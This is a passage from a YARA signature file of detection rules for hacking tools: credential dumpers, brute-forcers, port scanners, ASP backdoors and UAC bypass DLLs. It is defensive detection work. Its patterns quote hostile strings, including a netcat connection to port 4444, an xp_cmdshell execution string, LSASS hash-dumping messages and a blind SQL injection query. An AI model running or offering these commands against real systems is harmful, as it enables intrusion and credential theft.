   		description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"   
   	strings:   
   		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide   
   		$s2 = "Kiwi Taskmgr no-gpo" fullword wide   
   		$s3 = "KiwiAndTaskMgr" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and all of them   
rule VUBrute_config {   
   	meta:   
   		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"   
   		author = "Florian Roth"   
   		date = "22.11.14"   
   		score = 70   
   		reference = "http://goo.gl/xiIphp"   
   		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"   
   	strings:   
   		$s2 = "Restore=1" fullword ascii   
   		$s6 = "Thread=" ascii   
   		$s7 = "Running=1" fullword ascii   
   		$s8 = "CheckCombination=" fullword ascii   
   		$s10 = "AutoSave=1.000000" fullword ascii   
   		$s12 = "TryConnect=" ascii   
   		$s13 = "Tray=" ascii   
   	condition:   
   		all of them   
rule VSSown_VBS {   
   	meta:   
   		description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"   
   		author = "Florian Roth"   
   		date = "2015-10-01"   
   		score = 75   
   	strings:   
   		$s0 = "Select * from Win32_Service Where Name ='VSS'" ascii   
   		$s1 = "Select * From Win32_ShadowCopy" ascii   
   		$s2 = "cmd /C mklink /D " ascii   
   		$s3 = "ClientAccessible" ascii   
   		$s4 = "WScript.Shell" ascii   
   		$s5 = "Win32_Process" ascii   
   	condition:   
   		all of them   
rule whosthere_alt : Toolkit {   
   	meta:   
   		description = "Auto-generated rule - file whosthere-alt.exe"   
   		author = "Florian Roth"   
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"   
   		date = "2015-07-10"   
   		score = 80   
   		hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"   
   	strings:   
   		$s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '49.00' */   
   		$s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */   
   		$s2 = "dump output to a file, -o filename" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */   
   		$s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii /* PEStudio Blacklist: strings */ /* score: '29.00' */   
   		$s4 = "Error: pth.dll is not in the current directory!." fullword ascii /* score: '24.00' */   
   		$s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */   
   		$s6 = ".\\pth.dll" fullword ascii /* score: '16.00' */   
   		$s7 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 280KB and 2 of them   
rule aspbackdoor_EDIT {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"   
   	strings:   
   		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii   
   		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii   
   		$s3 = "response.write \"<a href='index.asp'>" fullword ascii   
   		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii   
   		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii   
   		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii   
   		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii   
   	condition:   
   		5 of them   
rule update_PcInit {   
   	meta:   
   		description = "Chinese Hacktool Set - file PcInit.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344"   
   	strings:   
   		$s1 = "\\svchost.exe" fullword ascii   
   		$s2 = "%s%08x.001" fullword ascii   
   		$s3 = "Global\\ps%08x" fullword ascii   
   		$s4 = "drivers\\" fullword ascii /* Goodware String - occured 2 times */   
   		$s5 = "StrStrA" fullword ascii /* Goodware String - occured 43 times */   
   		$s6 = "StrToIntA" fullword ascii /* Goodware String - occured 44 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 50KB and all of them   
rule sig_238_nbtdump {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"   
   	strings:   
   		$s0 = "Creation of results file - \"%s\" failed." fullword ascii   
   		$s1 = "c:\\>nbtdump remote-machine" fullword ascii   
   		$s7 = "Cerberus NBTDUMP" fullword ascii   
   		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii   
   		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide   
   		$s19 = "%s's password is %s</H3>" fullword wide   
   		$s20 = "%s's password is blank</H3>" fullword wide   
   	condition:   
   		5 of them   
rule pw_inspector {   
   	meta:   
   		description = "Chinese Hacktool Set - file pw-inspector.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215"   
   	strings:   
   		$s1 = "-m MINLEN  minimum length of a valid password" fullword ascii   
   		$s2 = "http://www.thc.org" fullword ascii   
   		$s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 460KB and all of them   
rule tools_Sqlcmd {   
   	meta:   
   		description = "Chinese Hacktool Set - file Sqlcmd.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "99d56476e539750c599f76391d717c51c4955a33"   
   	strings:   
   		$s0 = "[Usage]:  %s <HostName|IP> <UserName> <Password>" fullword ascii   
   		$s1 = "=============By uhhuhy(Feb 18,2003) - http://www.cnhonker.net=============" fullword ascii /* PEStudio Blacklist: os */   
   		$s4 = "Cool! Connected to SQL server on %s successfully!" fullword ascii   
   		$s5 = "EXEC master..xp_cmdshell \"%s\"" fullword ascii   
   		$s6 = "=======================Sqlcmd v0.21 For HScan v1.20=======================" fullword ascii   
   		$s10 = "Error,exit!" fullword ascii   
   		$s11 = "Sqlcmd>" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 40KB and 3 of them   
rule CN_Hacktool_MilkT_Scanner {   
   	meta:   
   		description = "Detects a chinese Portscanner named MilkT"   
   		author = "Florian Roth"   
   		score = 60   
   		date = "12.10.2014"   
   	strings:   
   		$s0 = "Bf **************" ascii fullword   
   		$s1 = "forming Time: %d/" ascii   
   		$s2 = "KERNEL32.DLL" ascii fullword   
   		$s3 = "CRTDLL.DLL" ascii fullword   
   		$s4 = "WS2_32.DLL" ascii fullword   
   		$s5 = "GetProcAddress" ascii fullword   
   		$s6 = "atoi" ascii fullword   
   	condition:   
   		all of them   
rule genhash_genhash : Toolkit  {   
   	meta:   
   		description = "Auto-generated rule - file genhash.exe"   
   		author = "Florian Roth"   
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"   
   		date = "2015-07-10"   
   		score = 80   
   		hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"   
   	strings:   
   		$s1 = "genhash.exe <password>" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */   
   		$s3 = "Password: %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */   
   		$s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii /* score: '11.00' */   
   		$s5 = "This tool generates LM and NT hashes." fullword ascii /* score: '10.00' */   
   		$s6 = "(hashes format: LM Hash:NT hash)" fullword ascii /* score: '10.00' */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and 2 of them   
rule Hacktools_CN_445_cmd {   
   	meta:   
   		description = "Disclosed hacktool set - file cmd.bat"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "69b105a3aec3234819868c1a913772c40c6b727a"   
   	strings:   
   		$bat = "@echo off" fullword ascii   
   		$s0 = "cs.exe %1" fullword ascii   
   		$s2 = "nc %1 4444" fullword ascii   
   	condition:   
   		$bat at 0 and all of ($s*)   
rule Dos_look {   
   	meta:   
   		description = "Chinese Hacktool Set - file look.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "e1a37f31170e812185cf00a838835ee59b8f64ba"   
   	strings:   
   		$s1 = "<description>CHKen QQ:41901298</description>" fullword ascii   
   		$s2 = "version=\"9.9.9.9\"" fullword ascii   
   		$s3 = "name=\"CH.Ken.Tool\"" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 40KB and all of them   
rule BypassUac_3 {   
   	meta:   
   		description = "Auto-generated rule - file BypassUacDll.dll"   
   		author = "yarGen Yara Rule Generator"   
   		hash = "1974aacd0ed987119999735cad8413031115ce35"   
   	strings:   
   		$s0 = "BypassUacDLL.dll" fullword wide   
   		$s1 = "\\Release\\BypassUacDll" ascii   
   		$s3 = "Win7ElevateDLL" fullword wide   
   		$s7 = "BypassUacDLL" fullword wide   
   	condition:   
   		3 of them   
rule lsadump   
   {   
   	meta:   
   		description		= "LSA dump programe (bootkey/syskey) - pwdump and others"   
   		author			= "Benjamin DELPY (gentilkiwi)"   
      
   	strings:   
   		$str_sam_inc	= "\\Domains\\Account" ascii nocase   
   		$str_sam_exc	= "\\Domains\\Account\\Users\\Names\\" ascii nocase   
   		$hex_api_call	= {(41 b8 | 68) 00 00 00 02 [0-64] (68 | ba) ff 07 0f 00 }   
   		$str_msv_lsa	= { 4c 53 41 53 52 56 2e 44 4c 4c 00 [0-32] 6d 73 76 31 5f 30 2e 64 6c 6c 00 }   
   		$hex_bkey		= { 4b 53 53 4d [20-70] 05 00 01 00}   
      
   	condition:   
   		( ($str_sam_inc and not $str_sam_exc) or $hex_api_call or $str_msv_lsa or $hex_bkey )   
         and not uint16(0) == 0x5a4d   
rule x64_KiwiCmd {   
   	meta:   
   		description = "Chinese Hacktool Set - file KiwiCmd.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"   
   	strings:   
   		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide   
   		$s2 = "Kiwi Cmd no-gpo" fullword wide   
   		$s3 = "KiwiAndCMD" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 400KB and 2 of them   
rule aspbackdoor_entice {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file entice.asp"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"   
   	strings:   
   		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii   
   		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii   
   		$s4 = "conndb.Execute(sqllanguage)" fullword ascii   
   		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii   
   		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii   
   	condition:   
   		all of them   
rule S_MultiFunction_Scanners_s {   
   	meta:   
   		description = "Chinese Hacktool Set - file s.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355"   
   	strings:   
   		$s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii   
   		$s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii   
   		$s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii   
   		$s3 = "explorer.exe http://www.hackdos.com" fullword ascii   
   		$s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii   
   		$s5 = "Failed to read file or invalid data in file!" fullword ascii   
   		$s6 = "www.hackdos.com" fullword ascii   
   		$s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii   
   		$s11 = "The interface of kernel library is invalid!" fullword ascii   
   		$s12 = "eventvwr" fullword ascii   
   		$s13 = "Failed to decompress data!" fullword ascii   
   		$s14 = "NOTEPAD.EXE result.txt" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 8000KB and 4 of them   
rule GoodToolset_ms11011 {   
   	meta:   
   		description = "Chinese Hacktool Set - file ms11011.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"   
   	strings:   
   		$s0 = "\\i386\\Hello.pdb" ascii   
   		$s1 = "OS not supported." fullword ascii   
   		$s3 = "Not supported." fullword wide  /* Goodware String - occured 3 times */   
   		$s4 = "SystemDefaultEUDCFont" fullword wide  /* Goodware String - occured 18 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and all of them   
rule Sniffer_analyzer_SSClone_1210_full_version {   
   	meta:   
   		description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e"   
   	strings:   
   		$s0 = "http://www.vip80000.com/hot/index.html" fullword ascii   
   		$s1 = "GetConnectString" fullword ascii   
   		$s2 = "CnCerT.Safe.SSClone.dll" fullword ascii   
   		$s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3580KB and all of them   
rule hscangui {   
   	meta:   
   		description = "Chinese Hacktool Set - file hscangui.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "af8aced0a78e1181f4c307c78402481a589f8d07"   
   	strings:   
   		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii   
   		$s2 = "http://www.cnhonker.com" fullword ascii   
   		$s3 = "%s@ftpscan#Cracked account:  %s/%s" fullword ascii   
   		$s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 220KB and 2 of them   
rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file Install.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "95866e917f699ee74d4735300568640ea1a05afd"   
   	strings:   
   		$s1 = "http://go.163.com/sdemo" fullword wide   
   		$s2 = "Player.tmp" fullword ascii   
   		$s3 = "Player.EXE" fullword wide   
   		$s4 = "mailto:sdemo@263.net" fullword ascii   
   		$s5 = "S-Player.exe" fullword ascii   
   		$s9 = "http://www.BaiXue.net (" fullword wide   
   	condition:   
   		all of them   
rule IISPutScanner {   
   	meta:   
   		description = "Chinese Hacktool Set - file IISPutScanner.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "9869c70d6a9ec2312c749aa17d4da362fa6e2592"   
   	strings:   
   		$s2 = "KERNEL32.DLL" fullword ascii   
   		$s3 = "ADVAPI32.DLL" fullword ascii   
   		$s4 = "VERSION.DLL" fullword ascii   
   		$s5 = "WSOCK32.DLL" fullword ascii   
   		$s6 = "COMCTL32.DLL" fullword ascii   
   		$s7 = "GDI32.DLL" fullword ascii   
   		$s8 = "SHELL32.DLL" fullword ascii   
   		$s9 = "USER32.DLL" fullword ascii   
   		$s10 = "OLEAUT32.DLL" fullword ascii   
   		$s11 = "LoadLibraryA" fullword ascii   
   		$s12 = "GetProcAddress" fullword ascii   
   		$s13 = "VirtualProtect" fullword ascii   
   		$s14 = "VirtualAlloc" fullword ascii   
   		$s15 = "VirtualFree" fullword ascii   
   		$s16 = "ExitProcess" fullword ascii   
   		$s17 = "RegCloseKey" fullword ascii   
   		$s18 = "GetFileVersionInfoA" fullword ascii   
   		$s19 = "ImageList_Add" fullword ascii   
   		$s20 = "BitBlt" fullword ascii   
   		$s21 = "ShellExecuteA" fullword ascii   
   		$s22 = "ActivateKeyboardLayout" fullword ascii   
   		$s23 = "BBABORT" fullword wide   
   		$s25 = "BBCANCEL" fullword wide   
   		$s26 = "BBCLOSE" fullword wide   
   		$s27 = "BBHELP" fullword wide   
   		$s28 = "BBIGNORE" fullword wide   
   		$s29 = "PREVIEWGLYPH" fullword wide   
   		$s30 = "DLGTEMPLATE" fullword wide   
   		$s31 = "TABOUTBOX" fullword wide   
   		$s32 = "TFORM1" fullword wide   
   		$s33 = "MAINICON" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and filesize > 350KB and all of them   
rule dubrute : bruteforcer toolkit   
   {   
       meta:   
           author = "Christian Rebischke (@sh1bumi)"   
           date = "2015-09-05"   
           description = "Rules for DuBrute Bruteforcer"   
           in_the_wild = true   
           family = "Hackingtool/Bruteforcer"   
          
       strings:   
           $a = "WBrute"   
           $b = "error.txt"   
           $c = "good.txt"   
           $d = "source.txt"   
           $e = "bad.txt"   
           $f = "Generator IP@Login;Password"   
      
       condition:   
           //check for MZ Signature at offset 0   
           uint16(0) == 0x5A4D    
      
           and    
      
           //check for dubrute specific strings   
           $a and $b and $c and $d and $e and $f    
rule Amplia_Security_Tool   
   {   
       meta:   
   		description = "Amplia Security Tool"   
   		score = 60   
   		nodeepdive = 1   
       strings:   
   		$a = "Amplia Security"   
   		$b = "Hernan Ochoa"   
   		$c = "getlsasrvaddr.exe"   
   		$d = "Cannot get PID of LSASS.EXE"   
   		$e = "extract the TGT session key"   
   		$f = "PPWDUMP_DATA"   
       condition: 1 of them   
rule HScan_v1_20_oncrpc {   
   	meta:   
   		description = "Chinese Hacktool Set - file oncrpc.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "e8f047eed8d4f6d2f5dbaffdd0e6e4a09c5298a2"   
   	strings:   
   		$s1 = "clnt_raw.c - Fatal header serialization error." fullword ascii   
   		$s2 = "svctcp_.c - cannot getsockname or listen" fullword ascii   
   		$s3 = "too many connections (%d), compilation constant FD_SETSIZE was only %d" fullword ascii   
   		$s4 = "svc_run: - select failed" fullword ascii   
   		$s5 = "@(#)bindresvport.c" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 340KB and 4 of them   
rule CN_Toolset_NTscan_PipeCmd {   
   	meta:   
   		description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"   
   		author = "Florian Roth"   
   		reference = "http://qiannao.com/ls/905300366/33834c0c/"   
   		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"   
   		date = "2015/03/30"   
   		score = 70   
   		hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"   
   	strings:   
   		$s2 = "Please Use NTCmd.exe Run This Program." fullword ascii   
   		$s3 = "PipeCmd.exe" fullword wide   
   		$s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii   
   		$s5 = "%s\\pipe\\%s%s%d" fullword ascii   
   		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii   
   		$s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii   
   		$s9 = "PipeCmdSrv.exe" fullword ascii   
   		$s10 = "This is a service executable! Couldn't start directly." fullword ascii   
   		$s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii   
   		$s14 = "PIPECMDSRV" fullword wide   
   		$s15 = "PipeCmd Service" fullword ascii   
   	condition:   
   		4 of them   
rule SQLCracker {   
   	meta:   
   		description = "Chinese Hacktool Set - file SQLCracker.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "1aa5755da1a9b050c4c49fc5c58fa133b8380410"   
   	strings:   
   		$s0 = "msvbvm60.dll" fullword ascii /* reversed goodware string 'lld.06mvbvsm' */   
   		$s1 = "_CIcos" fullword ascii   
   		$s2 = "kernel32.dll" fullword ascii   
   		$s3 = "cKmhV" fullword ascii   
   		$s4 = "080404B0" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 125KB and all of them   
rule cyclotron {   
   	meta:   
   		description = "Chinese Hacktool Set - file cyclotron.sys"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"   
   	strings:   
   		$s1 = "\\Device\\IDTProt" fullword wide   
   		$s2 = "IoDeleteSymbolicLink" fullword ascii  /* Goodware String - occured 467 times */   
   		$s3 = "\\??\\slIDTProt" fullword wide   
   		$s4 = "IoDeleteDevice" fullword ascii  /* Goodware String - occured 993 times */   
   		$s5 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3KB and all of them   
rule _Bitchin_Threads_ {   
   	meta:   
   		description = "Auto-generated rule on file =Bitchin Threads=.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"   
   	strings:   
   		$s0 = "DarKPaiN"   
   		$s1 = "=BITCHIN THREADS"   
   	condition:   
   		all of them   
rule FeliksPack3___Scanners_ipscan {   
   	meta:   
   		description = "Auto-generated rule on file ipscan.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "6c1bcf0b1297689c8c4c12cc70996a75"   
   	strings:   
   		$s2 = "WCAP;}ECTED"   
   		$s4 = "NotSupported"   
   		$s6 = "SCAN.VERSION{_"   
   	condition:   
   		all of them   
rule MarathonTool_2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file MarathonTool.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c"   
   	strings:   
   		$s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide   
   		$s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide   
   		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1000KB and all of them   
rule splitjoin {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"   
   	strings:   
   		$s0 = "Not for distribution without the authors permission" fullword wide   
   		$s2 = "Utility to split and rejoin files.0" fullword wide   
   		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide   
   		$s19 = "SplitJoin" fullword wide   
   	condition:   
   		all of them   
rule Cmdshell32 {   
   	meta:   
   		description = "Chinese Hacktool Set - file Cmdshell32.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "3c41116d20e06dcb179e7346901c1c11cd81c596"   
   	strings:   
   		$s1 = "cmdshell.exe" fullword wide   
   		$s2 = "cmdshell" fullword ascii   
   		$s3 = "[Root@CmdShell ~]#" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 62KB and all of them   
rule sig_238_FPipe {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"   
   	strings:   
   		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii   
   		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii   
   		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii   
   		$s3 = " -s    - outbound source port number" fullword ascii   
   		$s5 = "http://www.foundstone.com" fullword ascii   
   		$s20 = "Attempting to connect to %s port %d" fullword ascii   
   	condition:   
   		all of them   
rule IDTools_For_WinXP_IdtTool {   
   	meta:   
   		description = "Chinese Hacktool Set - file IdtTool.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6"   
   	strings:   
   		$s2 = "IdtTool.sys" fullword ascii   
   		$s4 = "Idt Tool bY tMd[CsP]" fullword wide   
   		$s6 = "\\\\.\\slIdtTool" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 25KB and all of them   
rule IsDebug_V1_4 {   
   	meta:   
   		description = "Chinese Hacktool Set - file IsDebug V1.4.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "ca32474c358b4402421ece1cb31714fbb088b69a"   
   	strings:   
   		$s0 = "IsDebug.dll" fullword ascii   
   		$s1 = "SV Dumper V1.0" fullword wide   
   		$s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii   
   		$s8 = "Error WriteMemory failed" fullword ascii   
   		$s9 = "IsDebugPresent" fullword ascii   
   		$s10 = "idb_Autoload" fullword ascii   
   		$s11 = "Bin Files" fullword ascii   
   		$s12 = "MASM32 version" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 30KB and all of them   
rule whosthere_alt_pth : Toolkit  {   
   	meta:   
   		description = "Auto-generated rule - file pth.dll"   
   		author = "Florian Roth"   
   		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"   
   		date = "2015-07-10"   
   		score = 80   
   		hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"   
   	strings:   
   		$s0 = "c:\\debug.txt" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */   
   		$s1 = "pth.dll" fullword ascii /* score: '20.00' */   
   		$s2 = "\"Primary\" string found at %.8Xh" fullword ascii /* score: '7.00' */   
   		$s3 = "\"Primary\" string not found!" fullword ascii /* score: '6.00' */   
   		$s4 = "segment 1 found at %.8Xh" fullword ascii /* score: '6.00' */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 240KB and 4 of them   
rule sig_238_TELNET {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"   
   	strings:   
   		$s0 = "TELNET [host [port]]" fullword wide   
   		$s2 = "TELNET.EXE" fullword wide   
   		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide   
   		$s14 = "Software\\Microsoft\\Telnet" fullword wide   
   	condition:   
   		all of them   
rule iKAT_revelations {   
   	meta:   
   		description = "iKAT hack tool showing the content of password fields - file revelations.exe"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 75   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"   
   	strings:   
   		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii   
   		$s8 = "BETAsupport@snadboy.com" fullword wide   
   		$s9 = "support@snadboy.com" fullword wide   
   		$s14 = "RevelationHelper.dll" fullword ascii   
   	condition:   
   		all of them   
rule Hacktools_CN_Panda_tesksd {   
   	meta:   
   		description = "Disclosed hacktool set - file tesksd.jpg"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"   
   	strings:   
   		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii   
   		$s1 = "ExeMiniDownload.exe" fullword wide   
   		$s16 = "POST %Hs" fullword ascii   
   	condition:   
   		all of them   
rule CN_Tools_PcShare {   
   	meta:   
   		description = "Chinese Hacktool Set - file PcShare.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "ee7ba9784fae413d644cdf5a093bd93b73537652"   
   	strings:   
   		$s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide   
   		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide   
   		$s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide   
   		$s5 = "port=%s;name=%s;pass=%s;" fullword wide   
   		$s16 = "%s\\ini\\*.dat" fullword wide   
   		$s17 = "pcinit.exe" fullword wide   
   		$s18 = "http://www.pcshare.cn" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 6000KB and 3 of them   
rule LinuxHacktool_eyes_pscan2_2 {   
   	meta:   
